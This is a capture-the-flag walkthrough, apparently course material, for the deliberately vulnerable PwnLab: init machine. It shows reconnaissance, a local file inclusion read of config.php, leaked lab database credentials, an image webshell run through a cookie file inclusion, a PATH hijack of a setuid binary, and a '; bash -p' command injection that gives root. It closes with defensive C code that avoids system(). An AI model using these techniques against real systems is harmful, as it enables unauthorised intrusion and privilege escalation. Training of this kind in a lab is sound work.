
Vulnhub-Pwnlab:init

Still the example used in the CISP course.

Target description
Welcome to "PwnLab: init", my first Boot2Root virtual machine. Meant to be easy, I hope you enjoy it and maybe learn something. The purpose of this CTF is to get root and read the flag.

Can contact me at: claor@pwnlab.net or on Twitter: @Chronicoder

Difficulty: Low
Flag: /root/flag.txt

Port scan

```
┌──(root㉿kali)-[~/tmp]
└─# nmap 192.168.1.11
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 10:48 CST
Nmap scan report for anonymous (192.168.1.11)
Host is up (0.00071s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
MAC Address: 00:0C:29:F0:7D:9E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.28 seconds
```

Web

The web application has a file upload page, but it requires logging in first.

First tried brute-forcing the password with Burp -> nothing found.
That is all the homepage offers, so next scan for directories.

```
┌──(root㉿kali)-[~/tmp]
└─# dirsearch -u 192.168.1.11
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/tmp/reports/_192.168.1.11/_25-08-19_16-31-41.txt

Target: http://192.168.1.11/

[16:31:41] Starting:
[16:31:51] 403 - 298B - /.ht_wsr.txt
[16:31:52] 403 - 301B - /.htaccess.bak1
[16:31:52] 403 - 303B - /.htaccess.sample
[16:31:52] 403 - 301B - /.htaccess.save
[16:31:52] 403 - 301B - /.htaccess.orig
[16:31:52] 403 - 299B - /.htaccess_sc
[16:31:52] 403 - 301B - /.htaccess_orig
[16:31:52] 403 - 302B - /.htaccess_extra
[16:31:52] 403 - 300B - /.htaccessOLD2
[16:31:52] 403 - 299B - /.htaccessOLD
[16:31:52] 403 - 299B - /.htaccessBAK
[16:31:52] 403 - 292B - /.html
[16:31:52] 403 - 291B - /.htm
[16:31:52] 403 - 301B - /.htpasswd_test
[16:31:52] 403 - 297B - /.htpasswds
[16:31:52] 403 - 298B - /.httr-oauth
[16:31:58] 403 - 291B - /.php
[16:31:58] 403 - 292B - /.php3
[16:33:07] 200 - 0B - /config.php
[16:33:38] 200 - 455B - /images/
[16:33:38] 301 - 313B - /images -> http://192.168.1.11/images/
[16:33:51] 200 - 164B - /login.php
[16:34:34] 403 - 300B - /server-status
[16:34:34] 403 - 301B - /server-status/
[16:34:58] 301 - 313B - /upload -> http://192.168.1.11/upload/
[16:34:58] 200 - 19B - /upload.php
[16:34:58] 200 - 404B - /upload/
```

There is a configuration file, config.php, but requesting it directly returns an empty body (200, 0B); upload.php is the upload page linked from the homepage and requires login first.
Now the question is whether config.php can be read.
Note the login page URL, http://192.168.1.11/?page=login; this parameter very likely has a local file inclusion (LFI).
Using the file:// wrapper directly gave nothing. Next I tried the php:// wrapper to read the file base64-encoded, but http://192.168.1.11/?page=php://filter/read=convert.base64-encode/resource=config.php did not work either. Since the initial value of page was "login" while the directory scan found login.php,
the code probably appends the .php suffix automatically, so read "config" without the extension instead.

```
┌──(root㉿kali)-[~/tmp]
└─# echo "PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+" | base64 -d
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
```

This gives the database username, password and database name.
Logging into the database (port 3306 is open) yields the web accounts and passwords.

```
MySQL [Users]> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.012 sec)

MySQL [Users]>
```

The actual passwords are the base64-decoded plaintexts of the pass column.

Log in as any of these users and prepare to upload a webshell.
Reading the source of upload.php through the LFI shows three checks: an extension whitelist, a MIME type check and a getimagesize() check.
So upload an image with PHP code embedded in it (an "image shell").

Afterwards the stored path of the uploaded file can be seen under upload:

upload/274a01ad7ad7ad7d73d5f0b399ae5db2.gif
The remaining problem is how to get this .gif parsed as PHP.
Continuing to read the homepage source through the php:// wrapper reveals a file inclusion vulnerability that can be used to have the uploaded gif executed as PHP.

Here the file to be included is taken from the lang parameter in the COOKIE, but note that the string "lang" is prepended to it.
So add lang=../upload/[filename] to the cookie;
visiting the homepage then shows the file being included successfully.

Connect with AntSword, open its virtual terminal and spawn a reverse shell.

Privilege escalation

After getting a www-data shell, several users show up under /home; reuse the account credentials from the web login to switch to the kent user.

```
www-data@pwnlab:/var$ cd /home
cd /home
www-data@pwnlab:/home$ ls
ls
john kane kent mike
www-data@pwnlab:/home$ su - kent
su - kent
Password: JWzXuBJJNy

kent@pwnlab:~$ ls
ls
kent@pwnlab:~$ cd
cd
kent@pwnlab:~$ ls
ls
kent@pwnlab:~$ cd /home
cd /home
kent@pwnlab:/home$ ls
ls
john kane kent mike
kent@pwnlab:/home$ cd kent
cd kent
kent@pwnlab:~$ ls
ls
kent@pwnlab:~$ ls -al
ls -al
total 20
drwxr-x--- 2 kent kent 4096 Mar 17 2016 .
drwxr-xr-x 6 root root 4096 Mar 17 2016 ..
-rw-r--r-- 1 kent kent  220 Mar 17 2016 .bash_logout
-rw-r--r-- 1 kent kent 3515 Mar 17 2016 .bashrc
-rw-r--r-- 1 kent kent  675 Mar 17 2016 .profile
kent@pwnlab:~$ sudo -l
sudo -l
-su: sudo: command not found
kent@pwnlab:~$
```

But there is nothing in kent's home, and sudo is not even installed.
Trying the other two users, kane can log in and has an executable in the home directory.

```
kane@pwnlab:~$ ls -al
ls -al
total 28
drwxr-x--- 2 kane kane 4096 Mar 17 2016 .
drwxr-xr-x 6 root root 4096 Mar 17 2016 ..
-rw-r--r-- 1 kane kane  220 Mar 17 2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17 2016 .bashrc
-rwsr-sr-x 1 mike mike 5148 Mar 17 2016 msgmike
-rw-r--r-- 1 kane kane  675 Mar 17 2016 .profile
kane@pwnlab:~$ file msgmike
file msgmike
msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped
```

Running it shows that it executes a cat command.

```
kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory
```

Since the binary is setuid and owned by mike, it can be used to escalate to mike: hijack the PATH environment variable so that the unqualified "cat" resolves to a cat of our own.

```
kane@pwnlab:~$ echo "/bin/bash" > cat
echo "/bin/bash" > cat
kane@pwnlab:~$ chmod 777 cat
chmod 777 cat
kane@pwnlab:~$ ls
ls
cat msgmike
kane@pwnlab:~$ ls -al
ls -al
total 32
drwxr-x--- 2 kane kane 4096 Aug 19 22:45 .
drwxr-xr-x 6 root root 4096 Mar 17 2016 ..
-rw-r--r-- 1 kane kane  220 Mar 17 2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17 2016 .bashrc
-rwxrwxrwx 1 kane kane   10 Aug 19 22:45 cat
-rwsr-sr-x 1 mike mike 5148 Mar 17 2016 msgmike
-rw-r--r-- 1 kane kane  675 Mar 17 2016 .profile
kane@pwnlab:~$ export PATH=./:$PATH
export PATH=./:$PATH
kane@pwnlab:~$ ./msgmike
./msgmike
mike@pwnlab:~$ id
id
uid=1002(mike) gid=1002(mike) groups=1002(mike),1003(kane)
```

In mike's home directory there is another setuid executable, this one owned by root.

```
mike@pwnlab:/home/mike$ ls -al
ls -al
total 28
drwxr-x--- 2 mike mike 4096 Mar 17 2016 .
drwxr-xr-x 6 root root 4096 Mar 17 2016 ..
-rw-r--r-- 1 mike mike  220 Mar 17 2016 .bash_logout
-rw-r--r-- 1 mike mike 3515 Mar 17 2016 .bashrc
-rwsr-sr-x 1 root root 5364 Mar 17 2016 msg2root
-rw-r--r-- 1 mike mike  675 Mar 17 2016 .profile
mike@pwnlab:/home/mike$ file msg2root
file msg2root
msg2root: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=60bf769f8fbbfd406c047f698b55d2668fae14d3, not stripped
```

Looking at it with strings
shows that it runs the command /bin/echo %s >> /root/messages.txt, with the user's message substituted for %s.

So a ; after the message terminates the echo and lets us run a command of our choice through the shell. Here bash -p (privileged mode) is used so the spawned shell keeps root's effective uid instead of dropping it.

```
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: 1;ls
1;ls
1
msg2root
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: 11; bash -p
11; bash -p
11
bash-4.3# id
id
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
bash-4.3# su - root
su - root
Password:

su: Authentication failure
bash-4.3# cd /root
cd /root
bash-4.3# ls
ls
flag.txt messages.txt
bash-4.3# cat flag.txt
cat flag.txt
.-=~=-. .-=~=-.
(__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__ _)
(_ ___) _____ _ (_ ___)
(__ _) / __ \ | | (__ _)
( _ __) | / \/ ___ _ __ __ _ _ __ __ _| |_ ___ ( _ __)
(__ _) | | / _ \| '_ \ / _` | '__/ _` | __/ __| (__ _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \ (_ ___)
(__ _) \____/\___/|_| |_|\__, |_| \__,_|\__|___/ (__ _)
( _ __) __/ | ( _ __)
(__ _) |___/ (__ _)
(__ _) (__ _)
(_ ___) If you are reading this, means that you have break 'init' (_ ___)
( _ __) Pwnlab. I hope you enjoyed and thanks for your time doing ( _ __)
(__ _) this challenge. (__ _)
(_ ___) (_ ___)
( _ __) Please send me your feedback or your writeup, I will love ( _ __)
(__ _) reading it (__ _)
(__ _) (__ _)
(__ _) For sniferl4bs.com (__ _)
( _ __) claor@PwnLab.net - @Chronicoder ( _ __)
(__ _) (__ _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-' `-._.-'
```
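Both escalation steps come from the same defect: a setuid program hands a command string to system(), so the caller's PATH decides which "cat" runs (msgmike) and a ";" in the message starts a second command (msg2root). The following is an added example of how the two helpers could have been written, not the original binaries (their source is not on the page, only the command strings); the file paths and function names are mine, and the fix in both cases is to do the file work with plain system calls and never start a shell.

```c
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

/* msg2root replacement: append one message to the log file without a shell.
 * The original ran "/bin/echo %s >> /root/messages.txt" through system(), so
 * "11; bash -p" became a second command. Here the text goes to write(2) and a
 * ';' is just a byte in the file. Returns 0 on success, -1 on error. */
int append_message(const char *logpath, const char *msg)
{
    int fd = open(logpath, O_WRONLY | O_APPEND | O_CREAT, 0600);
    if (fd < 0) return -1;
    size_t len = strlen(msg);
    int ok = write(fd, msg, len) == (ssize_t)len && write(fd, "\n", 1) == 1;
    close(fd);
    return ok ? 0 : -1;
}

/* msgmike replacement: copy a fixed file to out_fd with read/write instead of
 * system("cat /home/mike/msg.txt"). No PATH lookup happens, so a "cat" planted
 * in the caller's directory is never consulted. Returns bytes copied or -1. */
long show_file(const char *path, int out_fd)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    char buf[4096];
    long total = 0;
    ssize_t n;
    while ((n = read(fd, buf, sizeof buf)) > 0) {
        if (write(out_fd, buf, (size_t)n) != n) {
            close(fd);
            return -1;
        }
        total += n;
    }
    close(fd);
    return n < 0 ? -1 : total;
}

int main(void)
{
    /* Demo paths are placeholders; the real binaries used /root/messages.txt
     * and /home/mike/msg.txt. The input below is the injection string from
     * the session above, which now simply lands in the file as text. */
    if (append_message("/tmp/messages_demo.txt", "11; bash -p") != 0)
        return 1;
    return show_file("/tmp/messages_demo.txt", STDOUT_FILENO) < 0;
}
```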

Done.

Summary

  • On finding a config file, try reading its contents through the php:// wrapper.
  • Database password reuse: the credentials in the database log into the web accounts.
  • Image shell plus a file inclusion: the homepage source includes a file named by the lang cookie value.
  • Both privilege escalations are hijacks of an executable: one through the PATH environment variable, one through command injection.
  • Lesson: when a file read is available, do not skip the homepage and similar files; they may contain further information.